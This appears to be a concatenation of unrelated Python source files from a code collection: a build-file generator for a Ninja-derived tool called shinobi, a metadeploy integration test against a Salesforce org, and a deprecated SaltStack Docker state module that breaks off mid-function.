7dfa03ac9da7432d0763fe59ca5db422cf7de779
from happy_bittorrent.algorithms.torrent_manager import *
py
7dfa04db74c583287c261b7062c400e70518a05a
#!/usr/bin/env python # # Copyright 2001 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Script that generates the build.ninja for shinobi itself. Projects that use shinobi themselves should either write a similar script or use a meta-build system that supports Ninja output.""" from __future__ import print_function from optparse import OptionParser import os import pipes import string import subprocess import sys sourcedir = os.path.dirname(os.path.realpath(__file__)) sys.path.insert(0, os.path.join(sourcedir, 'misc')) import ninja_syntax class Platform(object): """Represents a host/target platform and its specific build attributes.""" def __init__(self, platform): self._platform = platform if self._platform is not None: return self._platform = sys.platform if self._platform.startswith('linux'): self._platform = 'linux' elif self._platform.startswith('freebsd'): self._platform = 'freebsd' elif self._platform.startswith('gnukfreebsd'): self._platform = 'freebsd' elif self._platform.startswith('openbsd'): self._platform = 'openbsd' elif self._platform.startswith('solaris') or self._platform == 'sunos5': self._platform = 'solaris' elif self._platform.startswith('mingw'): self._platform = 'mingw' elif self._platform.startswith('win'): self._platform = 'msvc' elif self._platform.startswith('bitrig'): self._platform = 'bitrig' elif self._platform.startswith('netbsd'): self._platform = 'netbsd' elif self._platform.startswith('aix'): self._platform = 'aix' elif self._platform.startswith('os400'): self._platform = 'os400' elif self._platform.startswith('dragonfly'): self._platform = 'dragonfly' @staticmethod def known_platforms(): return ['linux', 'darwin', 'freebsd', 'openbsd', 'solaris', 'sunos5', 'mingw', 'msvc', 'gnukfreebsd', 'bitrig', 'netbsd', 'aix', 'dragonfly'] def platform(self): return self._platform def is_linux(self): return self._platform == 'linux' def is_mingw(self): return self._platform == 'mingw' def is_msvc(self): return self._platform == 'msvc' def msvc_needs_fs(self): popen = subprocess.Popen(['cl', '/nologo', '/?'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = popen.communicate() return b'/FS' in out def is_windows(self): return self.is_mingw() or self.is_msvc() def is_solaris(self): return self._platform == 'solaris' def is_aix(self): return self._platform == 'aix' def is_os400_pase(self): return self._platform == 'os400' or os.uname().sysname.startswith('OS400') def uses_usr_local(self): return self._platform in ('freebsd', 'openbsd', 'bitrig', 'dragonfly', 'netbsd') def supports_ppoll(self): return self._platform in ('freebsd', 'linux', 'openbsd', 'bitrig', 'dragonfly') def supports_ninja_browse(self): return (not self.is_windows() and not self.is_solaris() and not self.is_aix()) def can_rebuild_in_place(self): return not (self.is_windows() or self.is_aix()) class Bootstrap: """API shim for ninja_syntax.Writer that instead runs the commands. Used to bootstrap Ninja from scratch. In --bootstrap mode this class is used to execute all the commands to build an executable. It also proxies all calls to an underlying ninja_syntax.Writer, to behave like non-bootstrap mode. """ def __init__(self, writer, verbose=False): self.writer = writer self.verbose = verbose # Map of variable name => expanded variable value. self.vars = {} # Map of rule name => dict of rule attributes. self.rules = { 'phony': {} } def comment(self, text): return self.writer.comment(text) def newline(self): return self.writer.newline() def variable(self, key, val): # In bootstrap mode, we have no shinobi process to catch /showIncludes # output. self.vars[key] = self._expand(val).replace('/showIncludes', '') return self.writer.variable(key, val) def rule(self, name, **kwargs): self.rules[name] = kwargs return self.writer.rule(name, **kwargs) def build(self, outputs, rule, inputs=None, **kwargs): ruleattr = self.rules[rule] cmd = ruleattr.get('command') if cmd is None: # A phony rule, for example. return # Implement just enough of Ninja variable expansion etc. to # make the bootstrap build work. local_vars = { 'in': self._expand_paths(inputs), 'out': self._expand_paths(outputs) } for key, val in kwargs.get('variables', []): local_vars[key] = ' '.join(ninja_syntax.as_list(val)) self._run_command(self._expand(cmd, local_vars)) return self.writer.build(outputs, rule, inputs, **kwargs) def default(self, paths): return self.writer.default(paths) def _expand_paths(self, paths): """Expand $vars in an array of paths, e.g. from a 'build' block.""" paths = ninja_syntax.as_list(paths) return ' '.join(map(self._shell_escape, (map(self._expand, paths)))) def _expand(self, str, local_vars={}): """Expand $vars in a string.""" return ninja_syntax.expand(str, self.vars, local_vars) def _shell_escape(self, path): """Quote paths containing spaces.""" return '"%s"' % path if ' ' in path else path def _run_command(self, cmdline): """Run a subcommand, quietly. Prints the full command on error.""" try: if self.verbose: print(cmdline) subprocess.check_call(cmdline, shell=True) except subprocess.CalledProcessError: print('when running: ', cmdline) raise parser = OptionParser() profilers = ['gmon', 'pprof'] parser.add_option('--bootstrap', action='store_true', help='bootstrap a shinobi binary from nothing') parser.add_option('--verbose', action='store_true', help='enable verbose build') parser.add_option('--platform', help='target platform (' + '/'.join(Platform.known_platforms()) + ')', choices=Platform.known_platforms()) parser.add_option('--host', help='host platform (' + '/'.join(Platform.known_platforms()) + ')', choices=Platform.known_platforms()) parser.add_option('--debug', action='store_true', help='enable debugging extras',) parser.add_option('--profile', metavar='TYPE', choices=profilers, help='enable profiling (' + '/'.join(profilers) + ')',) parser.add_option('--with-gtest', metavar='PATH', help='ignored') parser.add_option('--with-python', metavar='EXE', help='use EXE as the Python interpreter', default=os.path.basename(sys.executable)) parser.add_option('--force-pselect', action='store_true', help='ppoll() is used by default where available, ' 'but some platforms may need to use pselect instead',) (options, args) = parser.parse_args() if args: print('ERROR: extra unparsed command-line arguments:', args) sys.exit(1) platform = Platform(options.platform) if options.host: host = Platform(options.host) else: host = platform BUILD_FILENAME = 'build.ninja' shinobi_writer = ninja_syntax.Writer(open(BUILD_FILENAME, 'w')) n = shinobi_writer if options.bootstrap: # Make the build directory. try: os.mkdir('build') except OSError: pass # Wrap shinobi_writer with the Bootstrapper, which also executes the # commands. print('bootstrapping shinobi...') n = Bootstrap(n, verbose=options.verbose) n.comment('This file is used to build shinobi itself.') n.comment('It is generated by ' + os.path.basename(__file__) + '.') n.newline() n.variable('ninja_required_version', '1.3') n.newline() n.comment('The arguments passed to configure.py, for rerunning it.') configure_args = sys.argv[1:] if '--bootstrap' in configure_args: configure_args.remove('--bootstrap') n.variable('configure_args', ' '.join(configure_args)) env_keys = set(['CXX', 'AR', 'CFLAGS', 'CXXFLAGS', 'LDFLAGS']) configure_env = dict((k, os.environ[k]) for k in os.environ if k in env_keys) if configure_env: config_str = ' '.join([k + '=' + pipes.quote(configure_env[k]) for k in configure_env]) n.variable('configure_env', config_str + '$ ') n.newline() CXX = configure_env.get('CXX', 'g++') objext = '.o' if platform.is_msvc(): CXX = 'cl' objext = '.obj' def src(filename): return os.path.join('$root', 'src', filename) def built(filename): return os.path.join('$builddir', filename) def doc(filename): return os.path.join('$root', 'doc', filename) def cc(name, **kwargs): return n.build(built(name + objext), 'cxx', src(name + '.c'), **kwargs) def cxx(name, **kwargs): return n.build(built(name + objext), 'cxx', src(name + '.cc'), **kwargs) def binary(name): if platform.is_windows(): exe = name + '.exe' n.build(name, 'phony', exe) return exe return name root = sourcedir if root == os.getcwd(): # In the common case where we're building directly in the source # tree, simplify all the paths to just be cwd-relative. root = '.' n.variable('root', root) n.variable('builddir', 'build') n.variable('cxx', CXX) if platform.is_msvc(): n.variable('ar', 'link') else: n.variable('ar', configure_env.get('AR', 'ar')) if platform.is_msvc(): cflags = ['/showIncludes', '/nologo', # Don't print startup banner. '/Zi', # Create pdb with debug info. '/W4', # Highest warning level. '/WX', # Warnings as errors. '/wd4530', '/wd4100', '/wd4706', '/wd4244', '/wd4512', '/wd4800', '/wd4702', '/wd4819', # Disable warnings about constant conditional expressions. '/wd4127', # Disable warnings about passing "this" during initialization. '/wd4355', # Disable warnings about ignored typedef in DbgHelp.h '/wd4091', # Disable size_t -> int truncation warning. # We never have strings or arrays larger than 2**31. '/wd4267', '/DNOMINMAX', '/D_CRT_SECURE_NO_WARNINGS', '/DNINJA_PYTHON="%s"' % options.with_python] if platform.msvc_needs_fs(): cflags.append('/FS') ldflags = ['/DEBUG', '/libpath:$builddir'] if not options.debug: cflags += ['/Ox', '/DNDEBUG', '/GL'] ldflags += ['/LTCG', '/OPT:REF', '/OPT:ICF'] else: cflags = ['-g', '-Wall', '-Wextra', '-Wno-deprecated', '-Wno-missing-field-initializers', '-Wno-unused-parameter', '-fvisibility=hidden', '-pipe', '-std=c++17', '-DNINJA_PYTHON="%s"' % options.with_python] if options.debug: cflags += ['-D_GLIBCXX_DEBUG', '-D_GLIBCXX_DEBUG_PEDANTIC'] else: cflags += ['-O2', '-DNDEBUG'] try: proc = subprocess.Popen( [CXX, '-fdiagnostics-color', '-c', '-x', 'c++', '/dev/null', '-o', '/dev/null'], stdout=open(os.devnull, 'wb'), stderr=subprocess.STDOUT) if proc.wait() == 0: cflags += ['-fdiagnostics-color'] except: pass if platform.is_mingw(): cflags += ['-D_WIN32_WINNT=0x0601', '-D__USE_MINGW_ANSI_STDIO=1'] ldflags = ['-L$builddir', '-lboost_system', '-pthread'] if platform.uses_usr_local(): cflags.append('-I/usr/local/include') ldflags.append('-L/usr/local/lib') if platform.is_aix(): # printf formats for int64_t, uint64_t; large file support cflags.append('-D__STDC_FORMAT_MACROS') cflags.append('-D_LARGE_FILES') libs = [] if platform.is_mingw(): cflags.remove('-fvisibility=hidden'); ldflags.append('-static') elif platform.is_solaris(): cflags.remove('-fvisibility=hidden') elif platform.is_aix(): cflags.remove('-fvisibility=hidden') elif platform.is_msvc(): pass else: if options.profile == 'gmon': cflags.append('-pg') ldflags.append('-pg') elif options.profile == 'pprof': cflags.append('-fno-omit-frame-pointer') libs.extend(['-Wl,--no-as-needed', '-lprofiler']) if platform.supports_ppoll() and not options.force_pselect: cflags.append('-DUSE_PPOLL') if platform.supports_ninja_browse(): cflags.append('-DNINJA_HAVE_BROWSE') # Search for generated headers relative to build dir. cflags.append('-I.') def shell_escape(str): """Escape str such that it's interpreted as a single argument by the shell.""" # This isn't complete, but it's just enough to make NINJA_PYTHON work. if platform.is_windows(): return str if '"' in str: return "'%s'" % str.replace("'", "\\'") return str if 'CFLAGS' in configure_env: cflags.append(configure_env['CFLAGS']) ldflags.append(configure_env['CFLAGS']) if 'CXXFLAGS' in configure_env: cflags.append(configure_env['CXXFLAGS']) ldflags.append(configure_env['CXXFLAGS']) n.variable('cflags', ' '.join(shell_escape(flag) for flag in cflags)) if 'LDFLAGS' in configure_env: ldflags.append(configure_env['LDFLAGS']) n.variable('ldflags', ' '.join(shell_escape(flag) for flag in ldflags)) n.newline() if platform.is_msvc(): n.rule('cxx', command='$cxx $cflags -c $in /Fo$out /Fd' + built('$pdb'), description='CXX $out', deps='msvc' # /showIncludes is included in $cflags. ) else: n.rule('cxx', command='$cxx -MMD -MT $out -MF $out.d $cflags -c $in -o $out', depfile='$out.d', deps='gcc', description='CXX $out') n.newline() if host.is_msvc(): n.rule('ar', command='lib /nologo /ltcg /out:$out $in', description='LIB $out') elif host.is_mingw(): n.rule('ar', command='$ar crs $out $in', description='AR $out') else: n.rule('ar', command='rm -f $out && $ar crs $out $in', description='AR $out') n.newline() if platform.is_msvc(): n.rule('link', command='$cxx $in $libs /nologo /link $ldflags /out:$out', description='LINK $out') else: n.rule('link', command='$cxx $ldflags -o $out $in $libs', description='LINK $out') n.newline() objs = [] if platform.supports_ninja_browse(): n.comment('browse_py.h is used to inline browse.py.') n.rule('inline', command='"%s"' % src('inline.sh') + ' $varname < $in > $out', description='INLINE $out') n.build(built('browse_py.h'), 'inline', src('browse.py'), implicit=src('inline.sh'), variables=[('varname', 'kBrowsePy')]) n.newline() objs += cxx('browse', order_only=built('browse_py.h')) n.newline() n.comment('the depfile parser and shinobi lexers are generated using re2c.') def has_re2c(): try: proc = subprocess.Popen(['re2c', '-V'], stdout=subprocess.PIPE) return int(proc.communicate()[0], 10) >= 1103 except OSError: return False if has_re2c(): n.rule('re2c', command='re2c -b -i --no-generation-date -o $out $in', description='RE2C $out') # Generate the .cc files in the source directory so we can check them in. n.build(src('depfile_parser.cc'), 're2c', src('depfile_parser.in.cc')) n.build(src('lexer.cc'), 're2c', src('lexer.in.cc')) else: print("warning: A compatible version of re2c (>= 0.11.3) was not found; " "changes to src/*.in.cc will not affect your build.") n.newline() n.comment('Core source files all build into the daemon library') cxxvariables = [] if platform.is_msvc(): cxxvariables = [('pdb', 'daemon.pdb')] for name in ['daemon, dcache']: objs += cxx(name, variables=cxxvariables) if platform.is_msvc(): daemon_lib = n.build(built('daemon.lib'), 'ar', objs) else: daemon_lib = n.build(built('libdaemon.a'), 'ar', objs) n.newline() if platform.is_msvc(): libs.append('daemon.lib') else: libs.append('-ldaemon') all_targets = [] n.comment('Distributed build support') objs = cxx('daemon_exec', variables=cxxvariables) all_targets += n.build(binary('daemon_exec'), 'link', objs, implicit=daemon_lib, variables=[('libs', libs)]) n.newline() n.comment('Core source files all build into shinobi library.') objs = [] cxxvariables = [] if platform.is_msvc(): cxxvariables = [('pdb', 'ninja.pdb')] for name in ['build', 'build_log', 'clean', 'clparser', 'debug_flags', 'depfile_parser', 'deps_log', 'disk_interface', 'dyndep', 'dyndep_parser', 'edit_distance', 'eval_env', 'graph', 'graphviz', 'host_parser', 'lexer', 'line_printer', 'manifest_parser', 'metrics', 'parser', 'state', 'string_view_util', 'util', 'version']: objs += cxx(name, variables=cxxvariables) if platform.is_windows(): for name in ['subprocess-win32', 'includes_normalize-win32', 'msvc_helper-win32', 'msvc_helper_main-win32']: objs += cxx(name, variables=cxxvariables) if platform.is_msvc(): objs += cxx('minidump-win32', variables=cxxvariables) objs += cc('getopt') else: objs += cxx('subprocess-posix') if platform.is_aix(): objs += cc('getopt') if platform.is_msvc(): shinobi_lib = n.build(built('shinobi.lib'), 'ar', objs) else: shinobi_lib = n.build(built('libshinobi.a'), 'ar', objs) n.newline() if platform.is_msvc(): libs.append('shinobi.lib') else: libs.append('-lshinobi') if platform.is_aix() and not platform.is_os400_pase(): libs.append('-lperfstat') n.comment('Main executable is library plus main() function.') objs = cxx('ninja', variables=cxxvariables) shinobi = n.build(binary('shinobi'), 'link', objs, implicit=shinobi_lib, variables=[('libs', libs)]) n.newline() all_targets += shinobi if options.bootstrap: # We've built the shinobi binary. Don't run any more commands # through the bootstrap executor, but continue writing the # build.ninja file. n = shinobi_writer n.comment('Tests all build into shinobi_test executable.') objs = [] if platform.is_msvc(): cxxvariables = [('pdb', 'shinobi_test.pdb')] for name in ['build_log_test', 'build_test', 'clean_test', 'clparser_test', 'dcache_test', 'depfile_parser_test', 'deps_log_test', 'dyndep_parser_test', 'disk_interface_test', 'edit_distance_test', 'graph_test', 'host_parser_test', 'lexer_test', 'manifest_parser_test', 'ninja_test', 'state_test', 'string_view_util_test', 'subprocess_test', 'test', 'util_test']: objs += cxx(name, variables=cxxvariables) if platform.is_windows(): for name in ['includes_normalize_test', 'msvc_helper_test']: objs += cxx(name, variables=cxxvariables) shinobi_test = n.build(binary('shinobi_test'), 'link', objs, implicit=shinobi_lib, variables=[('libs', libs)]) n.newline() all_targets += shinobi_test n.comment('Ancillary executables.') for name in ['build_log_perftest', 'canon_perftest', 'depfile_parser_perftest', 'hash_collision_bench', 'manifest_parser_perftest', 'clparser_perftest']: if platform.is_msvc(): cxxvariables = [('pdb', name + '.pdb')] objs = cxx(name, variables=cxxvariables) all_targets += n.build(binary(name), 'link', objs, implicit=shinobi_lib, variables=[('libs', libs)]) n.newline() n.comment('Generate a graph using the "graph" tool.') n.rule('gendot', command='./shinobi -t graph all > $out') n.rule('gengraph', command='dot -Tpng $in > $out') dot = n.build(built('graph.dot'), 'gendot', ['shinobi', 'build.ninja']) n.build('graph.png', 'gengraph', dot) n.newline() n.comment('Generate the manual using asciidoc.') n.rule('asciidoc', command='asciidoc -b docbook -d book -o $out $in', description='ASCIIDOC $out') n.rule('xsltproc', command='xsltproc --nonet doc/docbook.xsl $in > $out', description='XSLTPROC $out') docbookxml = n.build(built('manual.xml'), 'asciidoc', doc('manual.asciidoc')) manual = n.build(doc('manual.html'), 'xsltproc', docbookxml, implicit=[doc('style.css'), doc('docbook.xsl')]) n.build('manual', 'phony', order_only=manual) n.newline() n.rule('dblatex', command='dblatex -q -o $out -p doc/dblatex.xsl $in', description='DBLATEX $out') n.build(doc('manual.pdf'), 'dblatex', docbookxml, implicit=[doc('dblatex.xsl')]) n.comment('Generate Doxygen.') n.rule('doxygen', command='doxygen $in', description='DOXYGEN $in') n.variable('doxygen_mainpage_generator', src('gen_doxygen_mainpage.sh')) n.rule('doxygen_mainpage', command='$doxygen_mainpage_generator $in > $out', description='DOXYGEN_MAINPAGE $out') mainpage = n.build(built('doxygen_mainpage'), 'doxygen_mainpage', ['README', 'COPYING'], implicit=['$doxygen_mainpage_generator']) n.build('doxygen', 'doxygen', doc('doxygen.config'), implicit=mainpage) n.newline() if not host.is_mingw(): n.comment('Regenerate build files if build script changes.') n.rule('configure', command='${configure_env}%s $root/configure.py $configure_args' % options.with_python, generator=True) n.build('build.ninja', 'configure', implicit=['$root/configure.py', os.path.normpath('$root/misc/ninja_syntax.py')]) n.newline() n.default(shinobi) n.newline() if host.is_linux(): n.comment('Packaging') n.rule('rpmbuild', command="misc/packaging/rpmbuild.sh", description='Building rpms..') n.build('rpm', 'rpmbuild') n.newline() n.build('all', 'phony', all_targets) n.close() print('wrote %s.' % BUILD_FILENAME) if options.bootstrap: print('bootstrap complete. rebuilding...') rebuild_args = [] if platform.can_rebuild_in_place(): rebuild_args.append('./shinobi') else: if platform.is_windows(): bootstrap_exe = 'shinobi.bootstrap.exe' final_exe = 'shinobi.exe' else: bootstrap_exe = './shinobi.bootstrap' final_exe = './shinobi' if os.path.exists(bootstrap_exe): os.unlink(bootstrap_exe) os.rename(final_exe, bootstrap_exe) rebuild_args.append(bootstrap_exe) if options.verbose: rebuild_args.append('-v') subprocess.check_call(rebuild_args)
py
7dfa05177526591a4751773edc42692b1b6eab54
""" These are end-to-end integration tests that touch stateful resources, like a Salesforce org. They should be run with caution, and needn't be run on every test run. """ from os import environ import pytest from django.core.exceptions import ImproperlyConfigured from metadeploy.api.jobs import run_flows from metadeploy.api.models import Job def env(name): try: return environ[name] except KeyError: raise ImproperlyConfigured( f"Cannot run integration tests. Missing environment variable: {name}." ) @pytest.mark.integration @pytest.mark.django_db def test_can_reach_salesforce( social_token_factory, social_account_factory, job_factory, user_factory, plan_factory, step_factory, version_factory, product_factory, ): # Ensure 12-factor-esque values are found: INSTANCE_URL = env("TEST_INSTANCE_URL") ORGANIZATION_ID = env("TEST_ORGANIZATION_ID") TOKEN = env("TEST_TOKEN") TOKEN_SECRET = env("TEST_TOKEN_SECRET") user = user_factory(socialaccount_set=[]) social_account = social_account_factory( user=user, extra_data={ "instance_url": INSTANCE_URL, "organization_details": { "Id": ORGANIZATION_ID, "Name": "Oddbird", "OrganizationType": "Developer Edition", }, }, socialtoken_set=[], ) social_token_factory(account=social_account, token=TOKEN, token_secret=TOKEN_SECRET) product = product_factory(repo_url="https://github.com/SFDO-Tooling/CumulusCI-Test") version = version_factory(commit_ish="feature/preflight", product=product) plan = plan_factory(version=version) steps = [step_factory(plan=plan)] job = job_factory(user=user) run_flows( user=user, plan=plan, skip_tasks=steps, organization_url=INSTANCE_URL, result_class=Job, result_id=job.id, )
py
7dfa05abf1580dff82d0cf1f0b537438980a04bf
# -*- coding: utf-8 -*- ''' Manage Docker containers ======================== .. deprecated:: 2015.8.0 Future feature development will be done only in :mod:`dockerng <salt.states.dockerng>`. See the documentation for this module for information on the deprecation path. `Docker <https://www.docker.io>`_ is a lightweight, portable, self-sufficient software container wrapper. The base supported wrapper type is `LXC <https://en.wikipedia.org/wiki/Linux_Containers>`_, `cgroups <https://en.wikipedia.org/wiki/Cgroups>`_, and the `Linux Kernel <https://en.wikipedia.org/wiki/Linux_kernel>`_. .. note:: This state module requires `docker-py <https://github.com/dotcloud/docker-py>`_ version >= 0.6.0 which supports `Docker Remote API version 1.12 <http://docs.docker.io/en/latest/reference/api/docker_remote_api_v1.6>`_. Available Functions ------------------- - built .. code-block:: yaml corp/mysuperdocker_img: docker.built: - path: /path/to/dir/container - pulled .. code-block:: yaml ubuntu: docker.pulled: - tag: latest - pushed .. code-block:: yaml corp/mysuperdocker_img: docker.pushed - installed .. code-block:: yaml mysuperdocker-container: docker.installed: - name: mysuperdocker - hostname: superdocker - image: corp/mysuperdocker_img - loaded .. code-block:: yaml mysuperdocker-file: docker.loaded: - name: mysuperdocker - source: salt://_files/tmp/docker_image.tar - running .. code-block:: yaml my_service: docker.running: - container: mysuperdocker - image: corp/mysuperdocker_img - ports: - "5000/tcp": HostIp: "" HostPort: "5000" .. note:: The ``ports`` argument above is a dictionary. The double indentation is required for PyYAML to load the data structure properly as a python dictionary. More information can be found :ref:`here <nested-dict-indentation>` - absent .. code-block:: yaml mys_old_uperdocker: docker.absent - run .. code-block:: yaml /finish-install.sh: docker.run: - cid: mysuperdocker - unless: grep -q something /var/log/foo - docker_unless: grep -q done /install_log Use Cases --------- Ensures the container is running with the latest image available .. code-block:: yaml my-service-image: docker.pulled: - name: registry/my-service:latest - force: true my-service-container: docker.installed: - image: registry/my-service:latest - watch: - docker: my-service-image my-service: docker.running: - container: my-service-container - watch: - docker: my-service-container .. note:: The docker modules are named ``dockerio`` because the name 'docker' would conflict with the underlying docker-py library. ''' from __future__ import absolute_import import functools import logging # Import salt libs from salt.ext.six import string_types import salt.utils import salt.ext.six as six # Enable proper logging log = logging.getLogger(__name__) # Define the module's virtual name __virtualname__ = 'docker' def __virtual__(): ''' Only load if the dockerio execution module is available ''' if 'docker.version' in __salt__: return __virtualname__ return False INVALID_RESPONSE = 'We did not get an acceptable answer from docker' VALID_RESPONSE = '' NOTSET = object() def _ret_status(exec_status=None, name='', comment='', result=None, changes=None): if not changes: changes = {} if exec_status is None: exec_status = {} if exec_status: if result is None: result = exec_status['status'] scomment = exec_status.get('comment', None) if scomment: comment += '\n' + scomment out = exec_status.get('out', None) if out: if isinstance(out, string_types): comment += '\n' + out return { 'changes': changes, 'result': result, 'name': name, 'comment': comment, } def _valid(exec_status=None, name='', comment='', changes=None): return _ret_status(exec_status=exec_status, comment=comment, name=name, changes=changes, result=True) def _invalid(exec_status=None, name='', comment='', changes=None): return _ret_status(exec_status=exec_status, comment=comment, name=name, changes=changes, result=False) def _get_image_name(image, tag): if ':' not in image: # backward compatibility: name could be already tagged return ':'.join((image, tag)) return image def _parse_volumes(volumes): ''' Parse a given volumes state specification for later use in modules.docker.create_container(). This produces a dict that can be directly consumed by the Docker API /containers/create. Note: this only really exists for backwards-compatibility, and because modules.dockerio.start() currently takes a binds argument. volumes A structure containing information about the volumes to be included in the container that will be created, either: - a bare dictionary - a list of dictionaries and lists .. code-block:: yaml # bare dict style - volumes: /usr/local/etc/ssl/certs/example.crt: bind: /etc/ssl/certs/com.example.internal.crt ro: True /var/run: bind: /var/run/host/ ro: False # list of dicts style: - volumes: - /usr/local/etc/ssl/certs/example.crt: bind: /etc/ssl/certs/com.example.internal.crt ro: True - /var/run: /var/run/host/ # read-write bound volume - /var/lib/mysql # un-bound, container-only volume note: bind mounts specified like "/etc/timezone:/tmp/host_tz" will fall through this parser. Returns a dict of volume specifications: .. code-block:: yaml { 'bindvols': { '/usr/local/etc/ssl/certs/example.crt': { 'bind': '/etc/ssl/certs/com.example.internal.crt', 'ro': True }, '/var/run/': { 'bind': '/var/run/host', 'ro': False }, }, 'contvols': [ '/var/lib/mysql/' ] } ''' log.trace("Parsing given volumes dict: " + str(volumes)) bindvolumes = {} contvolumes = [] if isinstance(volumes, dict): # If volumes as a whole is a dict, then there's no way to specify a non-bound volume # so we exit early and assume the dict is properly formed. bindvolumes = volumes if isinstance(volumes, list): for vol in volumes: if isinstance(vol, dict): for volsource, voldef in vol.items(): if isinstance(voldef, dict): target = voldef['bind'] read_only = voldef.get('ro', False) else: target = str(voldef) read_only = False source = volsource else: # isinstance(vol, dict) if ':' in vol: volspec = vol.split(':') source = volspec[0] target = volspec[1] read_only = False try: if len(volspec) > 2: read_only = volspec[2] == "ro" except IndexError: pass else: contvolumes.append(str(vol)) continue bindvolumes[source] = { 'bind': target, 'ro': read_only } result = {'bindvols': bindvolumes, 'contvols': contvolumes} log.trace("Finished parsing volumes, with result: " + str(result)) return result def mod_watch(name, sfun=None, *args, **kw): if sfun == 'built': # Needs to refresh the image kw['force'] = True build_status = built(name, **kw) result = build_status['result'] status = _ret_status(build_status, name, result=result, changes={name: result}) return status elif sfun == 'installed': # Throw away the old container and create a new one remove_container = __salt__['docker.remove_container'] remove_status = _ret_status(remove_container(container=name, force=True), name=name) installed_status = installed(name=name, **kw) result = installed_status['result'] and remove_status['result'] comment = remove_status['comment'] status = _ret_status(installed_status, name=name, result=result, changes={name: result}, comment=comment) return status elif sfun == 'running': # Force a restart or kill the container container = kw.get('container', name) kill_signal = kw.get('kill_signal') if kill_signal: killer = __salt__['docker.kill'] status = _ret_status(killer(container, signal=kill_signal), name=name, changes={name: True}) else: restarter = __salt__['docker.restart'] status = _ret_status(restarter(container), name=name, changes={name: True}) return status return {'name': name, 'changes': {}, 'result': False, 'comment': ('watch requisite is not' ' implemented for {0}'.format(sfun))} def pulled(name, tag='latest', force=False, insecure_registry=False, *args, **kwargs): ''' Pull an image from a docker registry. (`docker pull`) .. note:: See first the documentation for `docker login`, `docker pull`, `docker push`, and `docker.import_image <https://github.com/dotcloud/docker-py#api>`_ (`docker import <http://docs.docker.io/en/latest/reference/commandline/cli/#import>`_). NOTE that we added in SaltStack a way to authenticate yourself with the Docker Hub Registry by supplying your credentials (username, email & password) using pillars. For more information, see salt.modules.dockerio execution module. name Name of the image tag Tag of the image force Pull even if the image is already pulled insecure_registry Set to ``True`` to allow connections to non-HTTPS registries. Default ``False``. ''' inspect_image = __salt__['docker.inspect_image'] image_name = _get_image_name(name, tag) image_infos = inspect_image(image_name) if image_infos['status'] and not force: return _valid( name=name, comment='Image already pulled: {0}'.format(image_name)) if __opts__['test']: comment = 'Image {0} will be pulled'.format(image_name) return _ret_status(name=name, comment=comment) previous_id = image_infos['out']['Id'] if image_infos['status'] else None pull = __salt__['docker.pull'] returned = pull(name, tag=tag, insecure_registry=insecure_registry) if previous_id != returned['id']: changes = {name: {'old': previous_id, 'new': returned['id']}} comment = 'Image {0} pulled'.format(image_name) else: changes = {} comment = '' return _ret_status(returned, name, changes=changes, comment=comment) def pushed(name, tag='latest', insecure_registry=False): ''' Push an image from a docker registry. (`docker push`) .. note:: See first the documentation for `docker login`, `docker pull`, `docker push`, and `docker.import_image <https://github.com/dotcloud/docker-py#api>`_ (`docker import <http://docs.docker.io/en/latest/reference/commandline/cli/#import>`_). NOTE that we added in SaltStack a way to authenticate yourself with the Docker Hub Registry by supplying your credentials (username, email & password) using pillars. For more information, see salt.modules.dockerio execution module. name Name of the image tag Tag of the image [Optional] insecure_registry Set to ``True`` to allow connections to non-HTTPS registries. Default ``False``. ''' image_name = _get_image_name(name, tag) if __opts__['test']: comment = 'Image {0} will be pushed'.format(image_name) return _ret_status(name=name, comment=comment) push = __salt__['docker.push'] returned = push(name, tag=tag, insecure_registry=insecure_registry) log.debug("Returned: "+str(returned)) if returned['status']: changes = {name: {'Rev': returned['id']}} else: changes = {} return _ret_status(returned, name, changes=changes) def loaded(name, tag='latest', source=None, source_hash='', force=False): ''' Load an image into the local docker registry (`docker load`) name Name of the docker image tag tag of the image (defaults to 'latest') source The source .tar file to download to the minion, created by docker save this source file can be hosted on either the salt master server, or on an HTTP or FTP server. If the file is hosted on a HTTP or FTP server then the source_hash argument is also required .. note:: See first the documentation for Salt `file.managed <http://docs.saltstack.com/en/latest/ref/states/all/salt.states.file.html#salt.states.file.managed>`_ source_hash This can be one of the following: 1. a source hash string 2. the URI of a file that contains source hash strings force Load even if the image exists ''' inspect_image = __salt__['docker.inspect_image'] image_name = _get_image_name(name, tag) image_infos = inspect_image(image_name) if image_infos['status'] and not force: return _valid( name=name, comment='Image already loaded: {0}'.format(image_name)) if __opts__['test']: comment = 'Image {0} will be loaded'.format(image_name) return _ret_status(name=name, comment=comment) tmp_filename = salt.utils.mkstemp() __salt__['state.single']('file.managed', name=tmp_filename, source=source, source_hash=source_hash) changes = {} if image_infos['status']: changes['old'] = image_infos['out']['Id'] remove_image = __salt__['docker.remove_image'] remove_info = remove_image(image_name) if not remove_info['status']: return _invalid(name=name, comment='Image could not be removed: {0}'.format(name)) load = __salt__['docker.load'] returned = load(tmp_filename) image_infos = inspect_image(image_name) if image_infos['status']: changes['new'] = image_infos['out']['Id'] else: return _invalid( name=name, comment='Image {0} was not loaded into docker'.format(image_name)) return _ret_status(returned, name, changes=changes) def built(name, tag='latest', path=None, quiet=False, nocache=False, rm=True, force=False, timeout=None, *args, **kwargs): ''' Build a docker image from a path or URL to a dockerfile. (`docker build`) name Name of the image tag tag of the image (defaults to 'latest') path URL (e.g. `url/branch/docker_dir/dockerfile`) or filesystem path to the dockerfile ''' inspect_image = __salt__['docker.inspect_image'] image_name = _get_image_name(name, tag) image_infos = inspect_image(image_name) if image_infos['status'] and not force: return _valid( name=name, comment='Image already built: {0}, id: {1}'.format( image_name, image_infos['out']['Id'])) if __opts__['test']: comment = 'Image {0} will be built'.format(image_name) return {'name': name, 'changes': {}, 'result': None, 'comment': comment} previous_id = image_infos['out']['Id'] if image_infos['status'] else None build = __salt__['docker.build'] kw = dict(tag=image_name, path=path, quiet=quiet, nocache=nocache, rm=rm, timeout=timeout, ) returned = build(**kw) if previous_id != returned['id']: changes = {name: {'old': previous_id, 'new': returned['id']}} comment = 'Image {0} built'.format(image_name) else: changes = {} comment = '' return _ret_status(exec_status=returned, name=name, changes=changes, comment=comment) def installed(name, image, tag='latest', command=None, 